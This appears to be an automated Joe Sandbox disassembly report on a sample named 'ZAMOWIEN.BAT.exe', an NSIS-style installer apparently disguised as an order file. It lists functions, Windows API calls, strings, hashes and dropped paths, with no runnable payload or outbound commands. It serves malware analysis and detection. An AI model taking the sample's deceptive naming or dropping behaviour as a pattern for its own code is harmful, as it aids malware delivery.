Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: d01eac4b78642ee229a112484c6742e88cc4c4a3d825a65ded65f37d71907806
Instruction ID: 6f1c0151cd7d43f47b762ea71d1b9e47064f8d1d763c376de3beddb793e193d4
Opcode Fuzzy Hash: d01eac4b78642ee229a112484c6742e88cc4c4a3d825a65ded65f37d71907806
Instruction Fuzzy Hash: E5D012316151605BD6506B386E0C84B7A589F573717228B36F477F21E0C7788C728B98

Function 00404108 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404144
ShowWindow.USER32(?), ref: 00404164
GetWindowLongW.USER32(?,000000F0), ref: 00404176
ShowWindow.USER32(?,00000004), ref: 0040418F
DestroyWindow.USER32 ref: 004041A3
SetWindowLongW.USER32(?,00000000,00000000), ref: 004041BC
GetDlgItem.USER32(?,?), ref: 004041DB
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041EF
IsWindowEnabled.USER32(00000000), ref: 004041F6
GetDlgItem.USER32(?,?), ref: 004042A1
GetDlgItem.USER32(?,00000002), ref: 004042AB
SetClassLongW.USER32(?,000000F2,?), ref: 004042C5
SendMessageW.USER32(0000040F,00000000,?,?), ref: 00404316
GetDlgItem.USER32(?,00000003), ref: 004043BC
ShowWindow.USER32(00000000,?), ref: 004043DD
KiUserCallbackDispatcher.NTDLL(?,?), ref: 004043EF
EnableWindow.USER32(?,?), ref: 0040440A
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404420
EnableMenuItem.USER32(00000000), ref: 00404427
SendMessageW.USER32(?,000000F4,00000000,?), ref: 0040443F
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404452
lstrlenW.KERNEL32(007A1788,?,007A1788,00000000), ref: 0040447C
SetWindowTextW.USER32(?,007A1788), ref: 00404490
ShowWindow.USER32(?,0000000A), ref: 004045C4

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 121052019-0
Opcode ID: 8ccd94f120cb2cb21db35f14bdf27abdc0d6f088375f4d00d7c51710ad05dc42
Instruction ID: 303fd82a747fe417c3349a6549eb5d6b220af0d2d777654cb1e8b648a2c6df23
Opcode Fuzzy Hash: 8ccd94f120cb2cb21db35f14bdf27abdc0d6f088375f4d00d7c51710ad05dc42
Instruction Fuzzy Hash: F0C1ABB1500204BBDB216B61EE85A2B3AA8FBD6745F00453EF781B51F0CB7D9891DB1E

Function 00403D5A Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406A7C: GetModuleHandleA.KERNEL32(?,00000020,?,0040375B,0000000C), ref: 00406A8E
Part of subcall function 00406A7C: GetProcAddress.KERNEL32(00000000,?), ref: 00406AA9

lstrcatW.KERNEL32(1033,007A1788,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1788,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"), ref: 00403DDB
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne,1033,007A1788,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1788,00000000,00000002,74DF3420), ref: 00403E5B
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne,1033,007A1788,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1788,00000000), ref: 00403E6E
GetFileAttributesW.KERNEL32(Call), ref: 00403E79
LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne), ref: 00403EC2

Part of subcall function 004065CF: wsprintfW.USER32 ref: 004065DC

RegisterClassW.USER32(007A7240), ref: 00403EFF
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F17
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F4C
ShowWindow.USER32(00000005,00000000), ref: 00403F82
GetClassInfoW.USER32(00000000,RichEdit20W,007A7240), ref: 00403FAE
GetClassInfoW.USER32(00000000,RichEdit,007A7240), ref: 00403FBB
RegisterClassW.USER32(007A7240), ref: 00403FC4
DialogBoxParamW.USER32(?,00000000,00404108,00000000), ref: 00403FE3

Strings

1033, xrefs: 00403D7A, 00403DD6
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne, xrefs: 00403DEA, 00403DF2, 00403E95, 00403E9B, 00403EAB
RichEd20, xrefs: 00403F88
_Nb, xrefs: 00403EDE, 00403F46
Control Panel\Desktop\ResourceLocale, xrefs: 00403D8E
Call, xrefs: 00403E22, 00403E2B, 00403E39, 00403E88, 00403E8E
RichEd32, xrefs: 00403F96
C:\Users\user\AppData\Local\Temp\, xrefs: 00403D5F
.DEFAULT\Control Panel\International, xrefs: 00403DC6
@rz, xrefs: 00403ED1
RichEdit, xrefs: 00403FB5
.exe, xrefs: 00403E68
"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe", xrefs: 00403D5D
RichEdit20W, xrefs: 00403FA6, 00403FAC

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"$.DEFAULT\Control Panel\International$.exe$1033$@rz$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-71862671
Opcode ID: 7d4ed341b8cde1e0ceb827ac5ff258b46ad7f178c8ae00572014113b92d4ccdc
Instruction ID: c3905a2e03a3d38e695f7bd5a945e2bfd4337e3c47ad7fe5276eed6c7ef54057
Opcode Fuzzy Hash: 7d4ed341b8cde1e0ceb827ac5ff258b46ad7f178c8ae00572014113b92d4ccdc
Instruction Fuzzy Hash: 8361B370500601AED720BB269D49F2B3AACEBC5B45F40453EFA45B62E2DB7D5801CB6D

Function 004030D5 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 202
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004030E9
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,00000400), ref: 00403105

Part of subcall function 00406178: GetFileAttributesW.KERNELBASE(?,00403118,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,80000000,00000003), ref: 0040617C
Part of subcall function 00406178: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 0040619E

GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,80000000,00000003), ref: 0040314E
GlobalAlloc.KERNELBASE(00000040,?), ref: 00403293

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 0040332D
C:\Users\user\Desktop\ZAMOWIEN.BAT.exe, xrefs: 004030EF, 004030FE, 00403112, 0040312F
C:\Users\user\AppData\Local\Temp\, xrefs: 004030DF, 004032A1
Null, xrefs: 004031CE
Error launching installer, xrefs: 00403125
soft, xrefs: 004031C5
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032DF
"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe", xrefs: 004030DE
Inst, xrefs: 004031BC
C:\Users\user\Desktop, xrefs: 00403130, 00403135, 0040313B

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ZAMOWIEN.BAT.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-3554667666
Opcode ID: 4a29336d4ffd7063b2f4bdbec6a443a05de1bf81f4acacd5cb93d96bc8856641
Instruction ID: 77705ff1489b86543c93a013a68cfb70fd5493799dc798e6d10fcecd57b94fec
Opcode Fuzzy Hash: 4a29336d4ffd7063b2f4bdbec6a443a05de1bf81f4acacd5cb93d96bc8856641
Instruction Fuzzy Hash: 9A71F271900204ABCB20EFA4ED85BAE7EA8BB05316F20417FE505F62D1CB7C8A418B5D

Function 004066C5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004067E7
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,?,?), ref: 004067FD
SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 0040685B
CoTaskMemFree.OLE32(00000000,?,?,00000007,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,?,?), ref: 00406864
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,?,?), ref: 0040688F
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,?,?), ref: 004068E9

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 004067B8
Call, xrefs: 004066F2, 004067AC, 004067B3, 004067B7, 004067D0, 004067D1, 004067E6, 004067FC, 0040682D, 00406859, 0040688E, 00406894, 004068B1, 004068C4, 004068E2, 004068E8, 004068F1, 00406926
Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll, xrefs: 004066E9
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406889

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4024019347-2570203866
Opcode ID: 201dd695b3f630f4e881aaffbe3331da93e712b82754bfa4232950d621dbd105
Instruction ID: b657eecb44189dbf2ea588c4ce8a7a0ca8efa793a9a620c6a6bfd928ad763d37
Opcode Fuzzy Hash: 201dd695b3f630f4e881aaffbe3331da93e712b82754bfa4232950d621dbd105
Instruction Fuzzy Hash: D06157B26056005FD7206F25CC80B7A77E4AF95318F15863FF683B22D0DA3D8961865E

Function 0040570D Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,00000000,00000000,00000000), ref: 00405745
lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,00000000,00000000,00000000), ref: 00405755
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,00000000,00000000,00000000), ref: 00405768
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll), ref: 0040577A
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057A0
SendMessageW.USER32(?,0000104D,00000000,?), ref: 004057BA
SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C8

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll, xrefs: 0040572E, 0040573E, 00405744, 00405767, 00405773

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll
API String ID: 2531174081-3374265676
Opcode ID: ffb6b0f07760ea01c7bb82b55b40d6e58c63f7c8e02640becad7bdec7db374c2
Instruction ID: 56a05586292be73b733a1689028d4f4abe6e67a07e0ac7e122918b94fd064fd5
Opcode Fuzzy Hash: ffb6b0f07760ea01c7bb82b55b40d6e58c63f7c8e02640becad7bdec7db374c2
Instruction Fuzzy Hash: 2E219D75900518FACF119FA6DD84ADFBFB8EF85310F10802AF905B62A0C7795A50DFA8

Function 00406A0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A23
wsprintfW.USER32 ref: 00406A5E
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A72

Strings

%s%S.dll, xrefs: 00406A58
UXTHEME, xrefs: 00406A15

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME
API String ID: 2200240437-1106614640
Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
Instruction ID: 85504e4fb27a0db70598b33b690dc1f4826760d0c8c8d823ad52724bbb6d9fa0
Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
Instruction Fuzzy Hash: 62F0FC3060011967CF14BB64DD0EF9B375C9B41344F10447AA546F10D0EB789665CB98

Function 6E351817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6E351BFF: GlobalFree.KERNEL32(?), ref: 6E351E74
Part of subcall function 6E351BFF: GlobalFree.KERNEL32(?), ref: 6E351E79
Part of subcall function 6E351BFF: GlobalFree.KERNEL32(?), ref: 6E351E7E

GlobalFree.KERNEL32(00000000), ref: 6E3518C5
FreeLibrary.KERNEL32(?), ref: 6E35194B
GlobalFree.KERNEL32(00000000), ref: 6E351970

Part of subcall function 6E35243E: GlobalAlloc.KERNEL32(00000040,?), ref: 6E35246F

Part of subcall function 6E352810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6E351896,00000000), ref: 6E3528E0

Part of subcall function 6E351666: wsprintfW.USER32 ref: 6E351694

Strings

, xrefs: 6E351951

Memory Dump Source

Source File: 00000000.00000002.2093089192.000000006E351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E350000, based on PE: true

Associated: 00000000.00000002.2093066982.000000006E350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2093101356.000000006E354000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2093112847.000000006E356000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e350000_ZAMOWIEN.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: 4ad404b905b58fe295ebf03c9deefa9a2a1d74d0972e10c0b3d9fb74c223cdbb
Instruction ID: 8e63523d133c8910dbf98d7f1357c3a59d7998638ad80001231b414cf4728b30
Opcode Fuzzy Hash: 4ad404b905b58fe295ebf03c9deefa9a2a1d74d0972e10c0b3d9fb74c223cdbb
Instruction Fuzzy Hash: CB41E371800B42EBDF509FE4C984FE537ACAF05314F1448A5ED999B38ADBB590ACC7A0

Function 00403484 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403498

Part of subcall function 00403603: SetFilePointer.KERNELBASE(?,00000000,00000000,00403301,?), ref: 00403611

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033AE,00000004,00000000,00000000,?,?,00403328,000000FF,00000000,00000000,?,?), ref: 004034CB
SetFilePointer.KERNELBASE(00003E88,00000000,00000000,0040CE68,00793730,00004000,?,00000000,004033AE,00000004,00000000,00000000,?,?,00403328,000000FF), ref: 004035C6

Strings

07y, xrefs: 004034F8

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: FilePointer$CountTick
String ID: 07y
API String ID: 1092082344-1660179758
Opcode ID: 966f60e85e5dc44348139d68e6a150ac9c8ec8ac76a809b8b3099acb9bd23891
Instruction ID: 56bf74c0ceca5566ff8db9fe5fa7df2a6e32981cd73e22c1ddd474f0fcee49b1
Opcode Fuzzy Hash: 966f60e85e5dc44348139d68e6a150ac9c8ec8ac76a809b8b3099acb9bd23891
Instruction Fuzzy Hash: C831B072500214EFCB209F69FE8492A3BADF74479A714423BE401B22F0DB799902CB9D

Function 004061A7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004061C5
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403649,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403935), ref: 004061E0

Strings

nsa, xrefs: 004061B4
C:\Users\user\AppData\Local\Temp\, xrefs: 004061AC

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
